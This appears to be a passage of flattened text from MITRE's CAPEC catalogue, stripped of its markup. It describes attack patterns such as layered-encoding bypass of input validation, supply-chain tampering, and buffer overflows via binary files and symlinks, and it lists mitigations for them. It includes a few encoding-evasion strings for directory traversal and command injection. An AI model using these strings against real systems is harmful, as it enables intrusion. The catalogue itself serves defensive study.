LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2> In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop. Determine application/system inputs where bypassing input validation is desired The attacker first needs to determine all of the application's/system's inputs where input validation is being performed and where he/she wants to bypass it. While using an application/system, the attacker discovers an input where validation is stopping him/her from performing some malicious or unauthorized actions. env-All When provided with unexpected input, application provides an error message stating that the input was invalid or that access was denied. env-All Determine which character encodings are accepted by the application/system The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application's/system's response to the encoded data to determine whether the data was interpreted properly. Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, '\' env-All Determine whether URL encoding is accepted by the application/system. env-All Determine whether UTF-8 encoding is accepted by the application/system. env-All Determine whether UTF-16 encoding is accepted by the application/system. env-All Determine if any other encodings are accepted by the application/system. env-All System provides error message similar to the one it provided when a positive indicator was received for the first step. env-All Application/system accepts at least one high level character encoding where characters can be represented with multiple ASCII characters. Application/system interprets each character separately. Detect and alert on appearance of encodings in log messages (e.g. "Unsuccessful login by &lt;joe") Combine multiple encodings accepted by the application. The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times. Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: "\\\.". With two parsing layers, this may get converted to "\." after the first parsing layer, and then, to "." after the second. If the input validation layer is between the two parsing layers, then "\\\.\\\." might pass a test for ".." but still get converted to ".." afterwards. This may enable directory traversal attacks. env-All Combine multiple encodings and observe the effects. For example, the attacker might encode "." as "\.", and then, encode "\." as "&#92;&#46;", and then, encode that using URL encoding to "%26%2392%3B%26%2346%3B" env-All Application/System interprets the multiple encodings properly. env-All Attacker bypasses input validation layer(s) and passes data to application that it does not expect. Ensure that the input validation layer is executed after as many parsing layers as possible. Determine the details of any parsing layers that get executed after the input validation layer (this may be necessary in the case of filesystem access, for example, where the operating system also includes a parsing layer), and ensure that the input validator accounts for the various encodings of illegal characters and character sequences in those layers. Leverage ability to bypass input validation Attacker leverages his ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here. Gain access to sensitive files. env-All Perform command injection. env-All Perform SQL injection. env-All Perform XSS attacks. env-All Success outcome in previous step env-All Failure outcome in previous step env-All Gaining unauthorized access to system functionality. User input is used to construct a command to be executed on the target system or as part of the file name. Multiple parser passes are performed on the data supplied by the user. High Medium Injection Modification of Resources Using Escapes The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to "double escape" the backslash. In some cases, a quadruple escape is necessary. Original String: C:\\\\winnt\\\\system32\\\\cmd.exe /c <parsing layer> Interim String: C:\\winnt\\system32\\cmd.exe /c <parsing layer> Final String: C:\winnt\system32\cmd.exe /c This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string. [R.43.1][REF-2] Medium Initially a fuzzer can be used to see what the application is successfully and escaping and what causes problems. This may be a good starting point. Manually try to introduce multiple layers of control characters and see how many layers the application can escape. Control characters are being detected by the filters repeatedly. An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it. Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Integrity Modify application data Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Read application data 171 Targeted 179 Targeted 181 Targeted 184 Targeted 183 Targeted 77 Targeted 78 Targeted 74 Targeted 20 Targeted 697 Targeted 707 Targeted 1000 Attack Pattern ChildOf 267 Defense in Depth Penetration Medium High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html [R.43.1][REF-2] Cigital, Inc 2007-03-01 [R.43.1][REF-2] Cigital, Inc 2007-03-01 Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description and Summary Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases Low 1000 Attack Pattern ChildOf 427 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content Low 1000 Attack Pattern ChildOf 430 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content Low 1000 Attack Pattern ChildOf 431 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message. The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human "buffer overflow" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving. Low 1000 Attack Pattern ChildOf 427 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary Low 1000 Attack Pattern ChildOf 427 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content Low 1000 Attack Pattern ChildOf 427 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content An attacker disrupts the supply chain lifecycle by manipulating computer system hardware, software, or services for the purpose of espionage, theft of critical data or technology, or to disrupt mission-critical operations or infrastructure. Supply chain operations are usually multi-national with parts, components, assembly, and delivery occurring in countries outside the United States. The economics of computer crime are increasingly favoring supply chain attacks as data theft and extortion, theft of technology covered by export controls, and industrial espionage can be carried out through modifications in technologies typically regarded as harmless. Manipulating a technology, component, or product, such as USB Thumb Drive, digital camera, or digital projector can provide a direct means for compromising targeted organizations with very little risk to the attacker. Gautham Nagesh Latest cybersecurity threat lies in trusted software and hardware Nextgov.com 2008 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Marianne Swanson Nadya Bartol Rama Moorthy Piloting Supply Chain Risk Management Practices for Federal Information Systems Section 1. Introduction Draft NISTIR 7622 National Institute of Standards and Technology 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality. One example is Seagate's Maxtor Personal Storage 3200 drive. The drives were built under contract and contained a virus that stole user passwords. 1000 Attack Pattern ChildOf 437 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Marcus Sachs Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization Verizon, Inc. Thea Reilkoff Hardware Trojans: A Novel Attack Meets a New Defense Yale School of Engineering and Applied Science 2010 Marianne Swanson Nadya Bartol Rama Moorthy Piloting Supply Chain Risk Management Practices for Federal Information Systems Section 1. Introduction Draft NISTIR 7622 National Institute of Standards and Technology 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threats of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging. A malicious OEM provider may install software, or modify existing code, during distribution. Additionally, external contractors may be involved in the packaging or testing of products or components, granting another window of opportunity to modify or undermine the integrity of the technology. 1000 Attack Pattern ChildOf 437 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 SAFECode The Software Supply Chain Integrity Framework Defining Risks and Responsibilities for Securing Software in the Global Supply Chain Safecode.org 2009 Marianne Swanson Nadya Bartol Rama Moorthy Piloting Supply Chain Risk Management Practices for Federal Information Systems Section 1. Introduction Draft NISTIR 7622 National Institute of Standards and Technology 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. This can allow the attacker access to the execution stack and execute arbitrary code in the target process. This attack pattern is a variant of standard buffer overflow attacks using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The attacker is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application, for the victim to download. The attacker then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow. Target software processes binary resource files. Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file. Very High High Modification of Resources Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the attacker has an excellent vector for wide distribution. There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship. Medium To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability Perform appropriate bounds checking on all buffers. Design: Enforce principle of least privilege Design: Static code analysis Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes Implementation: Keep software patched to ensure that known vulnerabilities are not available for attackers to target on host. Availability DoS: crash / exit / restart Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code 120 Targeted 119 Targeted 697 Targeted 713 Targeted 1000 Attack Pattern PeerOf 23 1000 Attack Pattern PeerOf 35 1000 Attack Pattern ChildOf 100 1000 Attack Pattern ChildOf 165 Penetration Exploitation High High High All All All All C C++ G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.44.1][REF-2] Cigital, Inc 2007-01-01 [R.44.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Description Summary 1000 Attack Pattern ChildOf 437 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content An attacker inserts malicious logic into a product at some point during the supply chain lifecycle. Very often it is difficult to detect when the malicious modifications took place because of the complex nature of supply chain dynamics. One common example of malicious logic embedded into a product concerns USB Memory sticks shipping with viruses or trojans, infecting the host machine once they are inserted into the port. One common example of malicious logic embedded into a product concerns USB Memory sticks shipping with viruses or trojans, infecting the host machine once they are inserted into the port. 1000 Attack Pattern ChildOf 437 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content 1000 Attack Pattern ChildOf 441 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content An attacker uses their privileged position within an authorized software development organization to inject malicious logic into a codebase or product. Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In other cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by hackers. 1000 Attack Pattern ChildOf 442 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content 1000 Attack Pattern ChildOf 442 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content An attacker exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an attacker can control the elements included in a product's configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an attacker can control elements of a product's ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server. Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an attacker who has compromised the server can alter the software baseline that clients must install, allowing the attacker to compromise a large number of satellite machines using the configuration management system. If an attacker can control elements of a product's configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place. 1000 Attack Pattern ChildOf 444 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker conducts supply chain attacks by the inclusion of insecure 3rd party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer. The result is a window of opportunity for exploiting the product or software until the insecure component is discovered. This supply chain threat can result in the installation of software that introduces widespread security vulnerabilities within an organization. One example could be the inclusion of an exploitable DLL (Dynamic Link Library) included within an antivirus technology. Because software often depends upon a large number of interdependent libraries and components to be be present, security holes can be introduced merely by installing COTS software that comes pre-packaged with the components required for it to operate. 1000 Attack Pattern ChildOf 444 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker manipulates the codebase provided in a software patch, firmware version, or product update to contain malicious code. This results in devices, products, or software downloading and executing the attackers' code, or the code is introduced when the user updates the BIOS of a device. A malicious software update can perform any range of actions, depending on the attackers' intent. Of greatest concern are compromised updates that introduce logic bombs, deliberately hidden backdoors or rootkits, self-modifying code, keyloggers, or other means of gaining direct access to an organization's internal network. 1000 Attack Pattern ChildOf 442 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker tampers with the code of a product and injects malicious logic into the device in order to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors becomes important vectors of attack. 1000 Attack Pattern ChildOf 442 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker loads malicious code onto a USB memory stick in order to infect any supply chain-relevant machine which the device is plugged in to. This initially infected machine could then propagate the infection to products moving through the supply chain process. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. Access to the system containing the ATA Drive so that the drive can be physically removed from the system. One example concerns digital picture frames manufactured in China. When the user user plugs the picture frame into their computer via USB a worm is transmitted to their system. 1000 Attack Pattern ChildOf 448 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Marcus Sachs Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization Verizon, Inc. Deborah Gage Virus from China the gift that keeps on giving San Francisco Chronicle 2008 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary, Examples-Instances This type of attack leverages the use of symbolic links to cause buffer overflows. An attacker can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking. The attacker creates or modifies a symbolic link pointing to a resources (e.g., file, directory). The content of the symbolic link file includes out-of-bounds (e.g. excessive length) data. The target host consumes the data pointed to by the symbolic link file. The target host may either intentionally expect to read a symbolic link or it may be fooled by the replacement of the original resource and read the attackers' symbolic link. While consuming the data, the target host does not check for buffer boundary which can lead to a buffer overflow. If the content of the data is controlled by the attacker, this is an avenue for remote code execution. The attacker can create symbolic link on the target host. The target host does not perform correct boundary checking while consuming data from a resources. High High Injection Modification of Resources Attack Example: Overflow with Symbolic Links in EFTP Server The EFTP server has a buffer overflow that can be exploited if an attacker uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the attacker uploads some content (the link file) and then the attacker causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software. Low An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS. High Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level. The attacker will look for temporary files in the world readable directories. Those temporary files are often created and read by the system. The attacker will look for Symbolic link or link target file that she can override. An attacker creating or modifying Symbolic links is a potential signal of attack in progress. An attacker deleting temporary files can also be a sign that the attacker is trying to replace legitimate resources with malicious ones. Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource. Because Symlink can be modified by an attacker, make sure that the ones you read are located in protected directories. Pay attention to the resource pointed to by your symlink links (See attack pattern named "Forced Symlink race"), they can be replaced by malicious resources. Always check the size of the input data before copying to a buffer. Use a language or compiler that performs automatic bounds checking. Use an abstraction library to abstract away risky APIs. Not a complete solution. Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. Use OS-level preventative functionality. Not a complete solution. Availability DoS: crash / exit / restart Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read memory Integrity Modify memory The resource pointed to by the Symbolic link (e.g., file, directory, etc.) The buffer overrun by the attacker. When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code. The most common is remote code execution. 120 Targeted 285 Secondary 302 Targeted 118 Targeted 119 Targeted 74 Targeted 20 Targeted 680 Targeted 697 Targeted 1000 Attack Pattern ChildOf 100 Reluctance to trust Penetration Exploitation High High High All All All All C C++ G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-119: Buffer Errors Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/119.html [R.45.1][REF-2] Cigital, Inc 2007-03-01 [R.45.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Probing_Techniques, Solutions_and_Mitigations 1000 Attack Pattern ChildOf 449 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content 1000 Attack Pattern ChildOf 448 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content 1000 Attack Pattern ChildOf 441 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content 1000 Attack Pattern ChildOf 452 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content Some level of physical access to the device being attacked. 1000 Attack Pattern ChildOf 453 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content An attacker produces counterfeit hardware components which are included in product assembly during some portion of the supply chain lifecycle. The production of products containing counterfeit components such as counterfeit routers, switches, Ethernet, as well as WAN (Wide Area Networking) cards results in the acquirer obtaining a device specifically designed for malicious purposes. The problem of counterfeit hardware is not limited to small or "one-off" vendors, but has included major trusted suppliers, such as Cisco. There are billions of transistors in a single integrated circuit and researchers have shown that fewer than 10 transistors are required to create malicious functionality, such as keylogging or password theft. The acquisition and use of hundreds of counterfeit devices by U.S. Naval Academy, the U.S. Naval Air Warfare Center, U.S. Naval Undersea Warfare Center, and U.S. Air Base at Spangdahelm, Germany has led to widespread fears of foreign espionage occurring in key centers of US military intelligence and logistics planning. 1000 Attack Pattern ChildOf 453 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Thea Reilkoff Hardware Trojans: A Novel Attack Meets a New Defense Yale School of Engineering and Applied Science 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary, Examples-Instances 1000 Attack Pattern ChildOf 441 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content Some level of physical access to the device being attacked. 1000 Attack Pattern ChildOf 456 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content An attacker inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device. Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for "flash" based malware or malicious logic. One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card's chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller. 1000 Attack Pattern ChildOf 456 Information Technology Laboratory Supply Chain Risk Management (SCRM) National Institute of Standards and Technology (NIST) 2010 Robert Lemos Researchers: Rootkits headed for BIOS SecurityFocus 2006 Tom Stracener MITRE 2010-12-01 Tom Stracener MITRE 2010-12-01 Sean Barnum MITRE 2010-12-05 Review and revision of content Sean Barnum MITRE 2010-12-05 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker exploits a weakness in the MD5 hash algorithm (weak collision resistance) to generate a certificate signing request (CSR) that contains collision blocks in the "to be signed" part. The attacker specially crafts two different, but valid X.509 certificates that when hashed with the MD5 algorithm would yield the same value. The attacker then sends the CSR for one of the certificates to the Certification Authority which uses the MD5 hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the attacker which is signed with its private key. An attacker then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the MD5 collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is 